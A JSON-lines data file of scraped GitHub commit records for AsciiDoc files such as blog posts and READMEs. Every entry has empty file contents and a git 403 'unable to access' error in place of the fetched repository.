{"commit":"8095c67c6fa2301fd86a2bf87fe493213f333d5e","subject":"Update helper commands","message":"Update helper commands\n","repos":"asciidocfx\/AsciidocFX,asciidocfx\/AsciidocFX,asciidocfx\/AsciidocFX,asciidocfx\/AsciidocFX","old_file":"CMD_NOTES.adoc","new_file":"CMD_NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidocfx\/AsciidocFX.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3059d3714679c935a8189e35e9c044ab3c84f3aa","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53bd84abef2de4078a5783055e74a8b2ddf7521d","subject":"Update 2016-11-07-Monday-Morning.adoc","message":"Update 2016-11-07-Monday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-Monday-Morning.adoc","new_file":"_posts\/2016-11-07-Monday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb0ee638293a63411f00dae4f825841c67b96827","subject":"Update 2016-02-04-Hallo-from-Tekk.adoc","message":"Update 2016-02-04-Hallo-from-Tekk.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f00175ad71f1beda6d5113525570c1c01732c3bf","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3165e7eb3b5ff660d7c8c652dd61f5d6c7f957ad","subject":"Update 2015-09-18-Soyjoy.adoc","message":"Update 2015-09-18-Soyjoy.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-18-Soyjoy.adoc","new_file":"_posts\/2015-09-18-Soyjoy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25d1c0c1609c8642fa33fe0df62cd5a8acf3e6fc","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00d5b8d50c25784fc0e13997ac1c887d1a708114","subject":"Publish 2017-02-21.adoc","message":"Publish 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"2017-02-21.adoc","new_file":"2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0cba17d17197bce84ff50284d61f4128a69ad06","subject":"Add missing ascii doc file","message":"Add missing ascii doc file\n\n\nFormer-commit-id: f86431e1fb70db773eeb8da0287148414fc9fbb8","repos":"GeoscienceAustralia\/Geodesy-Web-Services,GeoscienceAustralia\/Geodesy-Web-Services,GeoscienceAustralia\/Geodesy-Web-Services,GeoscienceAustralia\/geodesy-domain-model,GeoscienceAustralia\/Geodesy-Web-Services,GeoscienceAustralia\/geodesy-domain-model","old_file":"src\/site\/asciidoc\/rest-upload-sopac-sitelog.adoc","new_file":"src\/site\/asciidoc\/rest-upload-sopac-sitelog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GeoscienceAustralia\/geodesy-domain-model.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"8c529d3cff9671de0d92ec6587b8b0c6fb229614","subject":"Regex: add a regex.asciidoc documentation page describing the syntax","message":"Regex: add a regex.asciidoc documentation page describing the syntax\n","repos":"casimir\/kakoune,danr\/kakoune,jjthrash\/kakoune,danr\/kakoune,Somasis\/kakoune,mawww\/kakoune,mawww\/kakoune,mawww\/kakoune,alexherbo2\/kakoune,Somasis\/kakoune,occivink\/kakoune,jkonecny12\/kakoune,jjthrash\/kakoune,lenormf\/kakoune,casimir\/kakoune,jkonecny12\/kakoune,alexherbo2\/kakoune,alexherbo2\/kakoune,danr\/kakoune,casimir\/kakoune,jjthrash\/kakoune,alexherbo2\/kakoune,jjthrash\/kakoune,jkonecny12\/kakoune,lenormf\/kakoune,occivink\/kakoune,lenormf\/kakoune,casimir\/kakoune,Somasis\/kakoune,occivink\/kakoune,jkonecny12\/kakoune,Somasis\/kakoune,danr\/kakoune,mawww\/kakoune,occivink\/kakoune,lenormf\/kakoune","old_file":"doc\/manpages\/regex.asciidoc","new_file":"doc\/manpages\/regex.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jjthrash\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"22c6f971a38bca50ad128fb1e716b7f7e714767c","subject":"y2b create post Catherine Deluxe Edition Unboxing (PS3) (Love Is Over)","message":"y2b create post Catherine Deluxe Edition Unboxing (PS3) (Love Is Over)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-11-Catherine-Deluxe-Edition-Unboxing-PS3-Love-Is-Over.adoc","new_file":"_posts\/2011-10-11-Catherine-Deluxe-Edition-Unboxing-PS3-Love-Is-Over.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2518827f22f6c44d60ae6f073bfd2195b45dc392","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8111a389e4cb12ef92e8f2d524b6a8a17f2413bb","subject":"Footnote","message":"Footnote\n","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"scrittura_ts_asciidoc.adoc","new_file":"scrittura_ts_asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"e1f6d14c1b8605bf40c24f6590befc4fbab9cceb","subject":"y2b create post 3 Cool Gadgets Under $40","message":"y2b create post 3 Cool Gadgets Under $40","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-11-3-Cool-Gadgets-Under-40.adoc","new_file":"_posts\/2017-04-11-3-Cool-Gadgets-Under-40.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"926be246817902862d44dfecb88ef9c958162a97","subject":"y2b create post It Looks Like A Speaker...","message":"y2b create post It Looks Like A Speaker...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-10-It-Looks-Like-A-Speaker.adoc","new_file":"_posts\/2017-06-10-It-Looks-Like-A-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca176143e0e0f48c3a5462651c0b9e0ca55a48e1","subject":"y2b create post DON'T Buy The Batband, Unless...","message":"y2b create post DON'T Buy The Batband, Unless...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-03-DONTBuyTheBatbandUnless.adoc","new_file":"_posts\/2017-12-03-DONTBuyTheBatbandUnless.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a952750bfabc26c572bcb44325af2c86721ee565","subject":"Update 2018-04-02-Contextual-Styling-Demo.adoc","message":"Update 2018-04-02-Contextual-Styling-Demo.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2018-04-02-Contextual-Styling-Demo.adoc","new_file":"_posts\/2018-04-02-Contextual-Styling-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4a7f852e5b8e69325246e72799f9a35d18423d1","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba73280f3afe7aadd8c00c11a3acd75d2a421081","subject":"Publish 2016-9-6.adoc","message":"Publish 2016-9-6.adoc","repos":"jjmean2\/server-study,jjmean2\/server-study,jjmean2\/server-study,jjmean2\/server-study","old_file":"2016-9-6.adoc","new_file":"2016-9-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jjmean2\/server-study.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d0fae348891628b86967120227becdbb0c3d212","subject":"Update 2016-04-01-BREAKING-NEWS-Super-premium-parking-coming-to-the-Seven-Seas-Lagoon.adoc","message":"Update 2016-04-01-BREAKING-NEWS-Super-premium-parking-coming-to-the-Seven-Seas-Lagoon.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-04-01-BREAKING-NEWS-Super-premium-parking-coming-to-the-Seven-Seas-Lagoon.adoc","new_file":"_posts\/2016-04-01-BREAKING-NEWS-Super-premium-parking-coming-to-the-Seven-Seas-Lagoon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc14e95b8d79d98e0cbb241aee21ffe7e77025b7","subject":"Add Changelog (#1971)","message":"Add Changelog (#1971)\n\nFixes: #1907.\r\n","repos":"spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-gcp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db6391370d4b2d7e5050fbf4c39b03592d073aac","subject":"Add readme","message":"Add readme\n","repos":"noamt\/smarchive","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/noamt\/smarchive.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bb5dc81399761e4df986eefc2037165ee7981579","subject":"Update 2015-08-31-Java-8-Stream-et-Iterator.adoc","message":"Update 2015-08-31-Java-8-Stream-et-Iterator.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2015-08-31-Java-8-Stream-et-Iterator.adoc","new_file":"_posts\/2015-08-31-Java-8-Stream-et-Iterator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb448f4737cc131c6d8fc8ce92c80a5a735b9748","subject":"y2b create post Best Buy Rewards Unboxing Preview","message":"y2b create post Best Buy Rewards Unboxing Preview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-12-Best-Buy-Rewards-Unboxing-Preview.adoc","new_file":"_posts\/2011-12-12-Best-Buy-Rewards-Unboxing-Preview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d232ba58360f9995ab0af69a76adc5e8964adda","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb47ac10b755972231f1073143267c16992df1d7","subject":"Update 2014-09-15-Christening-the-Grimoire.adoc","message":"Update 2014-09-15-Christening-the-Grimoire.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-15-Christening-the-Grimoire.adoc","new_file":"_posts\/2014-09-15-Christening-the-Grimoire.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e12a0a6ab312613addc0c87c2e9051934ce00cab","subject":"new requirements doc. in progress","message":"new requirements doc. in progress\n","repos":"kbase\/nextgen,kbase\/nextgen,kbase\/nextgen","old_file":"docs\/design\/data\/requirements.asciidoc","new_file":"docs\/design\/data\/requirements.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kbase\/nextgen.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c806fb6e52caac6ee5c20635de27fafd552c0080","subject":"Start README.asciidoc","message":"Start README.asciidoc\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f61372b6b9c0eb22e8349a7c64227e2c6f7c9f3f","subject":"Added README file for github.","message":"Added README file for github.\n","repos":"bmharper\/tundra,deplinenoise\/tundra,bmharper\/tundra,bmharper\/tundra,deplinenoise\/tundra,bmharper\/tundra,deplinenoise\/tundra","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bmharper\/tundra.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c0420ab97fe5333e2a0e370a7252ad2100404ae","subject":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","message":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34576f0d604c08bacb7ca72c11db5ce2e4d2d21a","subject":"y2b create post iPad Mini Unboxing (New Apple iPad Mini Unboxing 2012)","message":"y2b create post iPad Mini Unboxing (New Apple iPad Mini Unboxing 2012)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-02-iPad-Mini-Unboxing-New-Apple-iPad-Mini-Unboxing-2012.adoc","new_file":"_posts\/2012-11-02-iPad-Mini-Unboxing-New-Apple-iPad-Mini-Unboxing-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1ade33a4101fd7f17977625ac787047f5c2cef1","subject":"Update 2015-11-11-Episode-29-38-Weeks-Old-Next-week-Brains.adoc","message":"Update 2015-11-11-Episode-29-38-Weeks-Old-Next-week-Brains.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-11-11-Episode-29-38-Weeks-Old-Next-week-Brains.adoc","new_file":"_posts\/2015-11-11-Episode-29-38-Weeks-Old-Next-week-Brains.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ae74931b8c058ed5a6ccd9e406132e493809f21","subject":"Add a README","message":"Add a README\n","repos":"chungy\/reflac","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chungy\/reflac.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"c36b54ab0416e33a241a7b245122051c8cfd9eb1","subject":"Readme improvements","message":"Readme improvements\n","repos":"skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skaterkamp\/szoo-faces.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ee1a31429b9118a28d544e4973d99ac5a801f40d","subject":"Add readme with installation and usage instructions","message":"Add readme with installation and usage instructions\n","repos":"rodm\/teamcity-gradle-init-scripts-plugin,rodm\/teamcity-gradle-init-scripts-plugin,rodm\/teamcity-gradle-init-scripts-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rodm\/teamcity-gradle-init-scripts-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c1c13e99456fd0c755ba122200b57056e2a2bbbc","subject":"Prereq","message":"Prereq\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"WS client.adoc","new_file":"WS client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"778d7a4a0c1367ab95f3a300990cb2d31fbb2aa7","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c4e7a099922b1b049895f52cacec865f928b1d8","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eff6690609947d336d246f868b35771a3ff263af","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f794cf675d1f439c8227aae1cf087734571a039f","subject":"Update 2016-12-1-re-Invent2016.adoc","message":"Update 2016-12-1-re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-1-re-Invent2016.adoc","new_file":"_posts\/2016-12-1-re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cfa148497e3832daa7c209cb354afda8f6dbc84","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9c37b9c64967fe16795c5ba7d16c8e288e76191","subject":"Strutturazione iniziale","message":"Strutturazione iniziale\n","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"scrittura_ts_asciidoc.adoc","new_file":"scrittura_ts_asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"463b196a60b754c7c05f57141e390f24f615e5bd","subject":"[ALV #5032] Update doc concerning nullable fields in subobjects","message":"[ALV #5032] Update doc concerning nullable fields in subobjects\n","repos":"alv-ch\/jobroom-api,alv-ch\/jobroom-api","old_file":"src\/docs\/asciidoc\/doc.adoc","new_file":"src\/docs\/asciidoc\/doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alv-ch\/jobroom-api.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a65db4e3d752fd5d5f671e61532a2de7527493c","subject":"Update 2017-01-02-Wish-list-for-2017.adoc","message":"Update 2017-01-02-Wish-list-for-2017.adoc","repos":"locnh\/locnh.github.io,locnh\/locnh.github.io,locnh\/locnh.github.io,locnh\/locnh.github.io","old_file":"_posts\/2017-01-02-Wish-list-for-2017.adoc","new_file":"_posts\/2017-01-02-Wish-list-for-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/locnh\/locnh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76639dead7eecbedf25c1ed86f97b719a9c9bda8","subject":"Create UserGuide.adoc","message":"Create UserGuide.adoc","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"UserGuide.adoc","new_file":"UserGuide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a33c23033b233fd6fda1cbc56e75a5d427631a94","subject":"migrated last post","message":"migrated last post\n","repos":"sebastianslutzky\/blog,sebastianslutzky\/blog","old_file":"_posts\/2015-11-24-take-control-of-your-api-aspects.adoc","new_file":"_posts\/2015-11-24-take-control-of-your-api-aspects.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebastianslutzky\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01c82a58fb27c566ce6356a7ea44de1883e79a79","subject":"Deleted 2016-12-1-There-was-a-keynote-lecture.adoc","message":"Deleted 2016-12-1-There-was-a-keynote-lecture.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-1-There-was-a-keynote-lecture.adoc","new_file":"2016-12-1-There-was-a-keynote-lecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 